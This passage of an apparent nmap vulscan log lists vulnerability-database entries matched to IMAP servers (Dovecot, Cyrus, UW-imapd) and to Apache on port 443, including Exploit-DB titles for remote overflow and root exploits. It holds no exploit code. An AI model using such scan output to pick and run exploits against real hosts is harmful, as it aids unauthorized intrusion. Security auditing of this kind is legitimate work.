11518| [CVE-1999-1224] IMAP 4.1 BETA, and possibly other versions, does not properly handle the SIGABRT (abort) signal, which allows local users to crash the server (imapd) via certain sequences of commands, which causes a core dump that may contain sensitive password information.
11519|
11520| SecurityFocus - https://www.securityfocus.com/bid/:
11521| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
11522| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
11523| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
11524| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
11525| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
11526| [84478] imapd CVE-1999-1224 Denial-Of-Service Vulnerability
11527| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
11528| [67306] Dovecot Denial of Service Vulnerability
11529| [65650] Eudora WorldMail imapd 'UID' Command Buffer Overflow Vulnerability
11530| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
11531| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
11532| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
11533| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
11534| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
11535| [51403] Eudora WorldMail imapd 'LIST' Command Buffer Overflow Vulnerability
11536| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
11537| [49949] Cyrus IMAPd NTTP Logic Error Authentication Bypass Vulnerability
11538| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
11539| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
11540| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
11541| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
11542| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
11543| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
11544| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
11545| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
11546| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
11547| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
11548| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
11549| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
11550| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
11551| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
11552| [26270] Perdition IMAPD __STR_VWRITE Remote Format String Vulnerability
11553| [25733] Mercury/32 IMAPD SEARCH Command Remote Stack Buffer Overflow Vulnerability
11554| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
11555| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
11556| [23058] Atrium Mercur IMapD NTLM Buffer Overflow Vulnerability
11557| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
11558| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
11559| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
11560| [17961] Dovecot Remote Information Disclosure Vulnerability
11561| [16672] Dovecot Double Free Denial of Service Vulnerability
11562| [15980] Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability
11563| [15753] Ipswitch Collaboration Suite and IMail Server IMAPD LIST Command Denial Of Service Vulnerability
11564| [12636] Cyrus IMAPD Multiple Remote Buffer Overflow Vulnerabilities
11565| [11738] Cyrus IMAPD Multiple Remote Unspecified Vulnerabilities
11566| [11729] Cyrus IMAPD Multiple Remote Vulnerabilities
11567| [6298] Cyrus IMAPD Pre-Login Heap Corruption Vulnerability
11568| [4713] Wu-imapd Partial Mailbox Attribute Remote Buffer Overflow Vulnerability
11569| [2856] Imapd 'Local' Buffer Overflow Vulnerabilities
11570| [1110] Univ. Of Washington imapd Buffer Overflow Vulnerabilities
11571| [502] NT IMail Imapd Buffer Overflow DoS Vulnerability
11572| [130] imapd Buffer Overflow Vulnerability
11573|
11574| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11575| [86382] Dovecot POP3 Service denial of service
11576| [84396] Dovecot IMAP APPEND denial of service
11577| [80453] Dovecot mail-search.c denial of service
11578| [71354] Dovecot SSL Common Name (CN) weak security
11579| [70325] Cyrus IMAPd NNTP security bypass
11580| [67675] Dovecot script-login security bypass
11581| [67674] Dovecot script-login directory traversal
11582| [67589] Dovecot header name denial of service
11583| [63267] Apple Mac OS X Dovecot information disclosure
11584| [62340] Dovecot mailbox security bypass
11585| [62339] Dovecot IMAP or POP3 denial of service
11586| [62256] Dovecot mailbox security bypass
11587| [62255] Dovecot ACL entry security bypass
11588| [60639] Dovecot ACL plugin weak security
11589| [57267] Apple Mac OS X Dovecot Kerberos security bypass
11590| [56763] Dovecot header denial of service
11591| [54363] Dovecot base_dir privilege escalation
11592| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
11593| [47526] UW-imapd rfc822_output_char() denial of service
11594| [46323] Dovecot dovecot.conf information disclosure
11595| [46227] Dovecot message parsing denial of service
11596| [45669] Dovecot ACL mailbox security bypass
11597| [45667] Dovecot ACL plugin rights security bypass
11598| [41085] Dovecot TAB characters authentication bypass
11599| [41009] Dovecot mail_extra_groups option unauthorized access
11600| [39342] Dovecot LDAP auth cache configuration security bypass
11601| [35767] Dovecot ACL plugin security bypass
11602| [34082] Dovecot mbox-storage.c directory traversal
11603| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
11604| [26536] Dovecot IMAP LIST information disclosure
11605| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
11606| [24709] Dovecot APPEND command denial of service
11607| [22629] RHSA-2005:408 updates for cyrus-imapd not installed
11608| [19460] Cyrus IMAP imapd buffer overflow
11609| [19455] Cyrus IMAP imapd extension off-by-one buffer overflow
11610| [18492] Novell NetMail IMAPD 101_mEna buffer overflow
11611| [10803] UW IMAP (wu-imapd) authenticated user buffer overflow
11612| [9238] UW IMAP (wu-imapd) could allow a remote attacker to access arbitrary files
11613| [9055] UW IMAP (wu-imapd) partial mailbox attributes to request buffer overflow
11614| [7345] Slackware Linux imapd and ipop3d core dump
11615| [573] Imapd denial of service
11616|
11617| Exploit-DB - https://www.exploit-db.com:
11618| [30724] Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability
11619| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
11620| [22061] Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 Pre-Login Heap Corruption Vulnerability
11621| [21443] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2)
11622| [21442] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1)
11623| [19849] UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)
11624| [19848] UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)
11625| [19847] UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities
11626| [19377] Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability
11627| [19107] Netscape Messaging Server 3.55,University of Washington imapd 10.234 Buffer Overflow Vulnerability
11628| [18354] WorldMail imapd 3.0 SEH overflow (egg hunter)
11629| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
11630| [16485] MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow
11631| [16482] MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
11632| [16480] MailEnable IMAPD W3C Logging Buffer Overflow
11633| [16477] Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
11634| [16475] MailEnable IMAPD (2.35) Login Request Buffer Overflow
11635| [16474] Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
11636| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
11637| [4429] Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit
11638| [3627] IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit
11639| [3527] Mercur IMAPD 5.00.14 Remote Denial of Service Exploit (win32)
11640| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
11641| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
11642| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
11643| [1380] Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit
11644| [1332] MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit
11645| [1327] FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
11646| [1151] MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit
11647| [1124] IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit
11648| [915] MailEnable Enterprise 1.x Imapd Remote Exploit
11649| [903] Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit
11650| [340] Linux imapd Remote Overflow File Retrieve Exploit
11651|
11652| OpenVAS (Nessus) - http://www.openvas.org:
11653| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
11654| [901025] Dovecot Version Detection
11655| [881425] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 x86_64
11656| [881403] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 x86_64
11657| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
11658| [881397] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 x86_64
11659| [881370] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 x86_64
11660| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
11661| [881318] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 x86_64
11662| [881255] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 x86_64
11663| [881050] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 i386
11664| [881049] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 i386
11665| [881007] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 i386
11666| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
11667| [880978] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 i386
11668| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
11669| [880958] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 i386
11670| [880905] CentOS Update for cyrus-imapd CESA-2009:1459 centos4 i386
11671| [880864] CentOS Update for cyrus-imapd CESA-2009:1459 centos5 i386
11672| [880826] CentOS Update for cyrus-imapd CESA-2009:1116 centos5 i386
11673| [880536] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 i386
11674| [870607] RedHat Update for dovecot RHSA-2011:0600-01
11675| [870520] RedHat Update for cyrus-imapd RHSA-2011:1508-01
11676| [870489] RedHat Update for cyrus-imapd RHSA-2011:1317-01
11677| [870471] RedHat Update for dovecot RHSA-2011:1187-01
11678| [870443] RedHat Update for cyrus-imapd RHSA-2011:0859-01
11679| [870153] RedHat Update for dovecot RHSA-2008:0297-02
11680| [864075] Fedora Update for cyrus-imapd FEDORA-2011-13832
11681| [863585] Fedora Update for cyrus-imapd FEDORA-2011-13869
11682| [863579] Fedora Update for cyrus-imapd FEDORA-2011-13860
11683| [863281] Fedora Update for cyrus-imapd FEDORA-2011-7193
11684| [863273] Fedora Update for cyrus-imapd FEDORA-2011-7217
11685| [863272] Fedora Update for dovecot FEDORA-2011-7612
11686| [863115] Fedora Update for dovecot FEDORA-2011-7258
11687| [861525] Fedora Update for dovecot FEDORA-2007-664
11688| [861394] Fedora Update for dovecot FEDORA-2007-493
11689| [861333] Fedora Update for dovecot FEDORA-2007-1485
11690| [860845] Fedora Update for dovecot FEDORA-2008-9202
11691| [860663] Fedora Update for dovecot FEDORA-2008-2475
11692| [860169] Fedora Update for dovecot FEDORA-2008-2464
11693| [860089] Fedora Update for dovecot FEDORA-2008-9232
11694| [840950] Ubuntu Update for dovecot USN-1295-1
11695| [840668] Ubuntu Update for dovecot USN-1143-1
11696| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
11697| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
11698| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
11699| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
11700| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
11701| [831590] Mandriva Update for cyrus-imapd MDVSA-2012:037 (cyrus-imapd)
11702| [831468] Mandriva Update for cyrus-imapd MDVSA-2011:149 (cyrus-imapd)
11703| [831410] Mandriva Update for cyrus-imapd MDVSA-2011:100 (cyrus-imapd)
11704| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
11705| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
11706| [831207] Mandriva Update for cyrus-imapd MDVA-2010:208 (cyrus-imapd)
11707| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
11708| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
11709| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
11710| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
11711| [800149] UW-imapd tmail and dmail BOF Vulnerabilities (Linux)
11712| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
11713| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
11714| [70696] Debian Security Advisory DSA 2377-1 (cyrus-imapd-2.2)
11715| [70407] Debian Security Advisory DSA 2318-1 (cyrus-imapd-2.2)
11716| [70259] FreeBSD Ports: dovecot
11717| [69965] Debian Security Advisory DSA 2258-1 (kolab-cyrus-imapd)
11718| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
11719| [69740] Debian Security Advisory DSA 2242-1 (cyrus-imapd-2.2)
11720| [66522] FreeBSD Ports: dovecot
11721| [66416] Mandriva Security Advisory MDVSA-2009:229-1 (cyrus-imapd)
11722| [66233] SLES10: Security update for Cyrus IMAPD
11723| [66226] SLES11: Security update for Cyrus IMAPD
11724| [66222] SLES9: Security update for Cyrus IMAPD
11725| [65938] SLES10: Security update for Cyrus IMAPD
11726| [65723] SLES11: Security update for Cyrus IMAPD
11727| [65523] SLES9: Security update for Cyrus IMAPD
11728| [65479] SLES9: Security update for cyrus-imapd
11729| [65094] SLES9: Security update for cyrus-imapd
11730| [65010] Ubuntu USN-838-1 (dovecot)
11731| [64989] CentOS Security Advisory CESA-2009:1459 (cyrus-imapd)
11732| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
11733| [64977] Debian Security Advisory DSA 1893-1 (cyrus-imapd-2.2 kolab-cyrus-imapd)
11734| [64965] Fedora Core 11 FEDORA-2009-9901 (cyrus-imapd)
11735| [64963] Fedora Core 10 FEDORA-2009-9869 (cyrus-imapd)
11736| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
11737| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
11738| [64898] FreeBSD Ports: cyrus-imapd
11739| [64864] Debian Security Advisory DSA 1881-1 (cyrus-imapd-2.2)
11740| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
11741| [64847] Fedora Core 10 FEDORA-2009-9428 (cyrus-imapd)
11742| [64846] Fedora Core 11 FEDORA-2009-9417 (cyrus-imapd)
11743| [64838] Mandrake Security Advisory MDVSA-2009:229 (cyrus-imapd)
11744| [64271] CentOS Security Advisory CESA-2009:1116 (cyrus-imapd)
11745| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
11746| [62854] FreeBSD Ports: dovecot-managesieve
11747| [61916] FreeBSD Ports: dovecot
11748| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
11749| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
11750| [60528] FreeBSD Ports: dovecot
11751| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
11752| [60089] FreeBSD Ports: dovecot
11753| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
11754| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
11755| [55807] Slackware Advisory SSA:2005-310-06 imapd
11756| [54861] Gentoo Security Advisory GLSA 200502-29 (cyrus-imapd)
11757| [54755] Gentoo Security Advisory GLSA 200411-34 (cyrus-imapd)
11758| [53739] Debian Security Advisory DSA 215-1 (cyrus-imapd)
11759| [53288] Debian Security Advisory DSA 597-1 (cyrus-imapd)
11760| [52297] FreeBSD Ports: cyrus-imapd
11761| [52296] FreeBSD Ports: cyrus-imapd
11762| [52295] FreeBSD Ports: cyrus-imapd
11763| [52294] FreeBSD Ports: cyrus-imapd
11764| [52172] FreeBSD Ports: cyrus-imapd
11765|
11766| SecurityTracker - https://www.securitytracker.com:
11767| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
11768| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
11769| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
11770| [1013278] Cyrus IMAPd Buffer Overflows in Annotate Extension, Cached Header, and Fetchnews May Let Remote Users Execute Arbitrary Code
11771|
11772| OSVDB - http://www.osvdb.org:
11773| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
11774| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
11775| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
11776| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
11777| [78304] Eudora WorldMail imapd SEH LIST Command Parsing Remote Overflow
11778| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
11779| [75445] Cyrus IMAP Server imapd index.c index_get_ids Function References Header NULL Dereference Remote DoS
11780| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
11781| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
11782| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
11783| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
11784| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
11785| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
11786| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
11787| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
11788| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
11789| [66113] Dovecot Mail Root Directory Creation Permission Weakness
11790| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
11791| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
11792| [66110] Dovecot Multiple Unspecified Buffer Overflows
11793| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
11794| [64783] Dovecot E-mail Message Header Unspecified DoS
11795| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
11796| [62796] Dovecot mbox Format Email Header Handling DoS
11797| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
11798| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
11799| [57843] Cyrus IMAP Server (cyrus-imapd) SIEVE Script Component (sieve/script.c) Crafted Script Handling Overflow
11800| [57681] UoW imap Server (uw-imapd) Arbitrary Remote File Access
11801| [52906] UW-imapd c-client Initial Request Remote Format String
11802| [52905] UW-imapd c-client Library RFC822BUFFER Routines rfc822_output_char Function Off-by-one
11803| [52456] UW-imapd on Debian Linux LOGIN Command Remote DoS
11804| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
11805| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
11806| [49485] UW-imapd dmail Utility Mailbox Name Handling Overflow
11807| [49484] UW-imapd tmail Utility Mailbox Name Handling Overflow
11808| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
11809| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
11810| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
11811| [43137] Dovecot mail_extra_groups Symlink File Manipulation
11812| [42979] Dovecot passdbs Argument Injection Authentication Bypass
11813| [42004] Perdition Mail Retrieval Proxy IMAPD IMAP Tag Remote Format String Arbitrary Code Execution
11814| [39876] Dovecot LDAP Auth Cache Security Bypass
11815| [39670] Mercury Mail Transport System IMAPD SEARCH Command Remote Overflow
11816| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
11817| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
11818| [31362] Novell NetMail IMAP Daemon (IMAPD) APPEND Command Remote Overflow
11819| [31361] Novell NetMail IMAP Daemon (IMAPD) APPEND Command DoS
11820| [31360] Novell NetMail IMAP Daemon (IMAPD) SUBSCRIBE Command Remote Overflow
11821| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
11822| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
11823| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
11824| [23281] Dovecot imap/pop3-login dovecot-auth DoS
11825| [23280] Dovecot Malformed APPEND Command DoS
11826| [18179] HP Tru64 UNIX imapd NLSPATH Environment Variable Local Overflow
11827| [13242] UW-imapd CRAM-MD5 Authentication Bypass
11828| [12385] Novell NetMail IMAPD 101_mEna Script Remote Overflow
11829| [12042] UoW imapd Multiple Unspecified Overflows
11830| [12037] UoW imapd (UW-IMAP) Multiple Command Remote Overflows
11831| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
11832| [911] UoW imapd AUTHENTICATE Command Remote Overflow
11833| [790] UoW imap Server (uw-imapd) BODY Request Remote Overflow
11834| [519] UoW imapd SIGABRT Signal Forced Crash Information Disclosure
11835|_
443/tcp open ssl/ssl syn-ack Apache httpd (SSL-only mode)
11837|_http-server-header: Apache/2
11838| vulscan: VulDB - https://vuldb.com:
11839| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
11840| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
11841| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
11842| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
11843| [134416] Apache Sanselan 0.97-incubator Loop denial of service
11844| [134415] Apache Sanselan 0.97-incubator Hang denial of service
11845| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
11846| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
11847| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
11848| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
11849| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
11850| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
11851| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
11852| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
11853| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
11854| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
11855| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
11856| [133750] Oracle Agile Recipe Management for Pharmaceuticals 9.3.3/9.3.4 Apache Commons FileUpload unknown vulnerability
11857| [133728] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
11858| [133644] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
11859| [133643] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache HTTP Server denial of service
11860| [133640] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Commons FileUpload unknown vulnerability
11861| [133638] Oracle Healthcare Master Person Index 3.0/4.0 Apache Commons FileUpload unknown vulnerability
11862| [133614] Oracle Data Integrator 12.2.1.3.0 Apache Batik unknown vulnerability
11863| [133594] Oracle WebCenter Portal 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
11864| [133591] Oracle JDeveloper 11.1.1.9.0/12.1.3.0.0/12.2.1.3.0 Apache Log4j unknown vulnerability
11865| [133590] Oracle Identity Analytics 11.1.1.5.8 Apache Commons FileUpload unknown vulnerability
11866| [133588] Oracle Endeca Information Discovery Integrator 3.2.0 Apache Commons FileUpload unknown vulnerability
11867| [133587] Oracle Data Integrator 11.1.1.9.0 Apache Groovy unknown vulnerability
11868| [133585] Oracle API Gateway 11.1.2.4.0 Apache Commons FileUpload unknown vulnerability
11869| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
11870| [133571] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache Commons FileUpload unknown vulnerability
11871| [133522] Oracle Instantis EnterpriseTrack 17.1/17.2/17.3 Apache Tomcat unknown vulnerability
11872| [133520] Oracle Instantis EnterpriseTrack 17.1/17.2/17.3 Apache HTTP Server denial of service
11873| [133518] Oracle Primavera Unifier up to 18.8 Apache Commons FileUpload unknown vulnerability
11874| [133508] Oracle Communications Instant Messaging Server 10.0.1 Apache Tomcat unknown vulnerability
11875| [133501] Oracle Communications Policy Management 12.1/12.2/12.3/12.4 Apache Struts 1 unknown vulnerability
11876| [133500] Oracle Communications Application Session Controller 3.7.1/3.8.0 Apache Tomcat unknown vulnerability
11877| [133493] Oracle Communications Pricing Design Center 11.1/12.0 Apache Log4j unknown vulnerability
11878| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
11879| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
11880| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
11881| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
11882| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
11883| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
11884| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
11885| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
11886| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
11887| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
11888| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
11889| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
11890| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
11891| [131859] Apache Hadoop up to 2.9.1 privilege escalation
11892| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
11893| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
11894| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
11895| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
11896| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
11897| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
11898| [130629] Apache Guacamole Cookie Flag weak encryption
11899| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
11900| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
11901| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
11902| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
11903| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
11904| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
11905| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
11906| [130123] Apache Airflow up to 1.8.2 information disclosure
11907| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
11908| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
11909| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
11910| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
11911| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11912| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11913| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11914| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
11915| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
11916| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
11917| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
11918| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
11919| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
11920| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
11921| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
